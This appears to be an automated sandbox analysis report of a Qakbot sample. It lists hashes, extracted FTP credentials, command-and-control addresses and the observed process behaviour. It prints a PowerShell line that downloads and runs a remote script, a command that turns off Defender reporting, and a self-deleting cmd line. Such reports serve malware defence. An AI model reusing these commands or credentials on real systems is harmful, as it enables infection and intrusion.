Analysis
-
max time kernel
149s -
max time network
46s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
28-12-2020 18:58
Static task
static1
Behavioral task
behavioral1
Sample
aatnj.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
aatnj.exe
Resource
win10v20201028
General
-
Target
aatnj.exe
-
Size
39.5MB
-
MD5
2cf766692a75309734b08b3bd8cc36df
-
SHA1
a003224582db124237e8c879d795aefe8d23b22b
-
SHA256
1ee6f8e9bbc53afa81c39326d5748c6c4322d2501c42adcb34f5b71bc34ae48b
-
SHA512
a28bf5af4c30152bd89d23e5295e9a6faa23eac6f312d7841bfb4664fe725bf42fed2fe4bb65c164709d6aa98a5ff66cbb78ed86396be975d2aeb1386afcda2c
Malware Config
Extracted
https://www.allens-treasure-house.com/books_files/001.ps1
Extracted
qakbot
1513068643
Protocol: ftp- Host:
66.96.133.9 - Port:
21 - Username:
help - Password:
eT5TerAcnFe6~
Protocol: ftp- Host:
174.123.38.58 - Port:
21 - Username:
log@thebrainregistry.com - Password:
4BQ1MeeRAwNZEVu
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
logger@ostergift.com - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
logger@grupocrepusculo.net - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
logger@trussedup.com - Password:
RoP4Af0RKAAQ74V
1.1.192.123:443
160.3.251.154:995
75.127.141.50:995
108.49.159.2:990
96.70.92.177:1194
70.184.255.4:443
73.171.50.80:443
98.201.98.191:443
104.159.220.171:443
100.8.244.14:443
66.76.136.65:443
24.45.150.163:443
216.201.159.118:443
66.76.136.65:1194
160.3.251.154:443
27.3.93.3:443
58.108.210.165:995
96.70.92.177:993
108.58.44.6:443
117.195.243.76:443
105.229.108.111:443
209.212.131.66:443
75.83.30.135:443
68.173.55.51:443
70.118.18.242:443
108.35.199.8:443
75.143.231.200:443
173.72.96.50:995
73.76.201.210:443
173.72.96.50:443
174.57.88.157:443
76.4.219.37:995
66.222.48.40:443
24.45.189.76:995
98.163.53.175:993
86.27.41.234:443
71.190.202.120:443
108.49.159.2:995
71.85.72.9:443
189.170.52.201:443
50.192.121.62:6881
47.223.78.244:993
98.163.220.232:443
98.191.105.101:995
216.251.203.253:443
108.49.159.2:993
192.158.217.32:21
132.206.59.132:443
192.158.217.32:443
73.183.141.219:443
151.202.46.113:443
47.143.83.172:443
198.57.88.73:443
66.189.228.49:995
98.20.35.129:443
71.207.137.218:443
132.251.250.58:443
71.194.162.118:443
108.214.190.141:22
68.228.32.197:2222
174.79.244.142:2222
73.171.208.223:443
73.255.36.173:443
47.22.21.180:995
73.251.254.127:443
24.194.177.157:995
73.198.142.130:995
76.188.197.130:443
75.167.243.66:443
100.36.37.26:995
104.137.5.218:443
173.49.95.92:443
136.61.161.102:443
98.191.105.101:993
107.184.242.19:443
73.250.49.41:443
174.81.187.84:443
73.84.126.181:443
65.218.249.250:443
24.14.39.10:443
100.1.178.79:6882
78.168.137.109:443
108.58.129.90:443
76.95.241.114:443
41.200.147.155:443
75.97.144.106:995
95.15.254.82:443
67.247.220.195:443
98.102.37.174:2222
72.250.217.132:443
41.249.172.38:443
70.184.181.88:443
71.84.92.193:995
73.77.96.186:443
108.35.21.79:443
108.58.129.90:995
151.202.46.113:995
82.34.193.149:443
88.252.146.139:995
68.83.130.163:443
73.235.172.45:443
24.45.230.32:443
24.77.124.178:443
184.155.19.94:2222
173.247.186.90:6882
78.164.51.158:443
125.25.133.71:995
72.251.9.200:443
38.93.152.30:443
172.87.188.2:443
73.171.208.63:443
5.220.175.152:2222
98.121.199.219:443
50.198.141.161:2222
174.16.153.98:995
173.28.239.79:443
184.186.73.221:443
170.185.153.17:2222
118.71.69.27:443
70.57.113.151:443
170.185.126.17:443
216.51.79.71:443
75.64.168.85:443
216.228.55.13:443
73.8.165.2:443
209.239.101.72:443
168.10.142.2:443
170.215.211.14:443
72.20.132.2:443
70.189.67.15:443
71.232.248.52:443
68.199.118.150:2222
165.138.13.253:995
100.35.50.18:2222
208.49.151.160:443
69.245.219.31:443
50.206.74.2:443
76.183.233.1:443
47.201.100.228:443
108.45.105.144:443
142.112.229.81:2222
65.35.242.188:443
69.157.60.221:2222
173.48.159.185:443
47.208.196.196:443
107.77.224.127:443
156.198.69.177:443
24.45.189.76:443
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 644 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
qcubrqe.exeqcubrqe.exepid process 1376 qcubrqe.exe 864 qcubrqe.exe -
Loads dropped DLL 2 IoCs
Processes:
aatnj.exepid process 292 aatnj.exe 292 aatnj.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\eetqscnq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Qcubrqec\\qcubrqe.exe\"" explorer.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 72 IoCs
Processes:
aatnj.exeaatnj.exeqcubrqe.exeqcubrqe.exepowershell.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEconhost.execmd.execonhost.exePING.EXEpid process 292 aatnj.exe 1540 aatnj.exe 1540 aatnj.exe 1376 qcubrqe.exe 864 qcubrqe.exe 644 powershell.exe 644 powershell.exe 864 qcubrqe.exe 656 explorer.exe 656 explorer.exe 1128 taskhost.exe 1232 Dwm.exe 1268 Explorer.EXE 292 aatnj.exe 644 powershell.exe 1476 conhost.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 2004 cmd.exe 1940 conhost.exe 2016 PING.EXE 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
qcubrqe.exepid process 1376 qcubrqe.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 644 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1268 Explorer.EXE 1268 Explorer.EXE 1268 Explorer.EXE 1268 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1268 Explorer.EXE 1268 Explorer.EXE 1268 Explorer.EXE 1268 Explorer.EXE -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
aatnj.exeqcubrqe.exeexplorer.execmd.exedescription pid process target process PID 292 wrote to memory of 1540 292 aatnj.exe aatnj.exe PID 292 wrote to memory of 1540 292 aatnj.exe aatnj.exe PID 292 wrote to memory of 1540 292 aatnj.exe aatnj.exe PID 292 wrote to memory of 1540 292 aatnj.exe aatnj.exe PID 292 wrote to memory of 1376 292 aatnj.exe qcubrqe.exe PID 292 wrote to memory of 1376 292 aatnj.exe qcubrqe.exe PID 292 wrote to memory of 1376 292 aatnj.exe qcubrqe.exe PID 292 wrote to memory of 1376 292 aatnj.exe qcubrqe.exe PID 292 wrote to memory of 272 292 aatnj.exe reg.exe PID 292 wrote to memory of 272 292 aatnj.exe reg.exe PID 292 wrote to memory of 272 292 aatnj.exe reg.exe PID 292 wrote to memory of 272 292 aatnj.exe reg.exe PID 292 wrote to memory of 644 292 aatnj.exe powershell.exe PID 292 wrote to memory of 644 292 aatnj.exe powershell.exe PID 292 wrote to memory of 644 292 aatnj.exe powershell.exe PID 292 wrote to memory of 644 292 aatnj.exe powershell.exe PID 1376 wrote to memory of 864 1376 qcubrqe.exe qcubrqe.exe PID 1376 wrote to memory of 864 1376 qcubrqe.exe qcubrqe.exe PID 1376 wrote to memory of 864 1376 qcubrqe.exe qcubrqe.exe PID 1376 wrote to memory of 864 1376 qcubrqe.exe qcubrqe.exe PID 1376 wrote to memory of 656 1376 qcubrqe.exe explorer.exe PID 1376 wrote to memory of 656 1376 qcubrqe.exe explorer.exe PID 1376 wrote to memory of 656 1376 qcubrqe.exe explorer.exe PID 1376 wrote to memory of 656 1376 qcubrqe.exe explorer.exe PID 1376 wrote to memory of 656 1376 qcubrqe.exe explorer.exe PID 656 wrote to memory of 1128 656 explorer.exe taskhost.exe PID 656 wrote to memory of 1128 656 explorer.exe taskhost.exe PID 656 wrote to memory of 1128 656 explorer.exe taskhost.exe PID 656 wrote to memory of 1232 656 explorer.exe Dwm.exe PID 656 wrote to memory of 1232 656 explorer.exe Dwm.exe PID 656 wrote to memory of 1232 656 explorer.exe Dwm.exe PID 656 wrote to memory of 1268 656 explorer.exe Explorer.EXE PID 656 wrote to memory of 1268 656 explorer.exe Explorer.EXE PID 656 wrote to memory of 1268 656 explorer.exe Explorer.EXE PID 656 wrote to memory of 292 656 explorer.exe aatnj.exe PID 656 wrote to memory of 292 656 explorer.exe aatnj.exe PID 656 wrote to memory of 292 656 explorer.exe aatnj.exe PID 656 wrote to memory of 644 656 explorer.exe powershell.exe PID 656 wrote to memory of 644 656 explorer.exe powershell.exe PID 656 wrote to memory of 644 656 explorer.exe powershell.exe PID 656 wrote to memory of 1476 656 explorer.exe conhost.exe PID 656 wrote to memory of 1476 656 explorer.exe conhost.exe PID 656 wrote to memory of 1476 656 explorer.exe conhost.exe PID 292 wrote to memory of 2004 292 aatnj.exe cmd.exe PID 292 wrote to memory of 2004 292 aatnj.exe cmd.exe PID 292 wrote to memory of 2004 292 aatnj.exe cmd.exe PID 292 wrote to memory of 2004 292 aatnj.exe cmd.exe PID 2004 wrote to memory of 2016 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 2016 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 2016 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 2016 2004 cmd.exe PING.EXE PID 656 wrote to memory of 2004 656 explorer.exe cmd.exe PID 656 wrote to memory of 2004 656 explorer.exe cmd.exe PID 656 wrote to memory of 2004 656 explorer.exe cmd.exe PID 656 wrote to memory of 1940 656 explorer.exe conhost.exe PID 656 wrote to memory of 1940 656 explorer.exe conhost.exe PID 656 wrote to memory of 1940 656 explorer.exe conhost.exe PID 656 wrote to memory of 2016 656 explorer.exe PING.EXE PID 656 wrote to memory of 2016 656 explorer.exe PING.EXE PID 656 wrote to memory of 2016 656 explorer.exe PING.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\aatnj.exe"C:\Users\Admin\AppData\Local\Temp\aatnj.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\aatnj.exe"C:\Users\Admin\AppData\Local\Temp\aatnj.exe" /C3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exeC:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exe" /C4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\dsgqusyinllxtjzempwebswphyar.txt'"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\aatnj.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19007207921145265970128245128521110818641071818068179498888-1386010726526966880"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1008628566724299117529814571568871720502565179-1509066441155205275116615787"1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrq.datMD5
205dccc6f14473f9d0f627dd82b990e6
SHA1b0da5441d278113fe1325b3abf23b31e9e695476
SHA2569a1b7b5484d936382438484e1be23cfe4724f2de237d82c705cbe5215d722c42
SHA5120d286fc012f951e1155ed985d8ea267a6bcf238c6f93bf0f928f4fba3d0d6a26c5f40472baba63a5fdecdf9acd6fb6b186f695bf2a6dc37f15bdc34e9c2b6196
-
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exeMD5
e8023ba3e33238f7d8afcf9edcb66dd5
SHA1103806275b0bf9d81f5a160fff610977155f2bf5
SHA256bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac
SHA5126180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exeMD5
e8023ba3e33238f7d8afcf9edcb66dd5
SHA1103806275b0bf9d81f5a160fff610977155f2bf5
SHA256bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac
SHA5126180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exeMD5
e8023ba3e33238f7d8afcf9edcb66dd5
SHA1103806275b0bf9d81f5a160fff610977155f2bf5
SHA256bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac
SHA5126180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1
-
\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exeMD5
e8023ba3e33238f7d8afcf9edcb66dd5
SHA1103806275b0bf9d81f5a160fff610977155f2bf5
SHA256bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac
SHA5126180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1
-
\Users\Admin\AppData\Roaming\Microsoft\Qcubrqec\qcubrqe.exeMD5
e8023ba3e33238f7d8afcf9edcb66dd5
SHA1103806275b0bf9d81f5a160fff610977155f2bf5
SHA256bb590da29b53a67165e55a7f34939979ceebb852753661a2befcfd3680dedcac
SHA5126180cd06604f7d174c42dc64b7ce5cd305d7dfa69affd821784bb486b88d30128d19819c2476a27bb4eabd8ea03b93f6d025775230120fc8a05be8d690e985d1
-
memory/272-7-0x0000000000000000-mapping.dmp
-
memory/292-26-0x0000000000580000-0x0000000000581000-memory.dmpFilesize
4KB
-
memory/644-16-0x0000000001F70000-0x0000000001F71000-memory.dmpFilesize
4KB
-
memory/644-17-0x0000000001ED0000-0x0000000001ED1000-memory.dmpFilesize
4KB
-
memory/644-9-0x0000000000000000-mapping.dmp
-
memory/644-12-0x000007FEF5DD0000-0x000007FEF67BC000-memory.dmpFilesize
9.9MB
-
memory/644-14-0x0000000001D90000-0x0000000001D91000-memory.dmpFilesize
4KB
-
memory/644-15-0x000000001AE10000-0x000000001AE11000-memory.dmpFilesize
4KB
-
memory/644-44-0x00000000026C0000-0x00000000026C1000-memory.dmpFilesize
4KB
-
memory/644-28-0x00000000021B0000-0x00000000021B1000-memory.dmpFilesize
4KB
-
memory/644-24-0x000000001B8A0000-0x000000001B8A1000-memory.dmpFilesize
4KB
-
memory/644-43-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/644-31-0x0000000002600000-0x0000000002601000-memory.dmpFilesize
4KB
-
memory/656-20-0x0000000000000000-mapping.dmp
-
memory/864-11-0x0000000000000000-mapping.dmp
-
memory/864-18-0x0000000002480000-0x0000000002491000-memory.dmpFilesize
68KB
-
memory/1128-22-0x0000000001B70000-0x0000000001B71000-memory.dmpFilesize
4KB
-
memory/1376-6-0x0000000000000000-mapping.dmp
-
memory/1376-19-0x0000000000E90000-0x0000000000EF8000-memory.dmpFilesize
416KB
-
memory/1540-3-0x0000000002480000-0x0000000002491000-memory.dmpFilesize
68KB
-
memory/1540-2-0x0000000000000000-mapping.dmp
-
memory/2004-45-0x0000000000000000-mapping.dmp
-
memory/2004-48-0x0000000000000000-mapping.dmp
-
memory/2016-46-0x0000000000000000-mapping.dmp
-
memory/2016-51-0x0000000000000000-mapping.dmp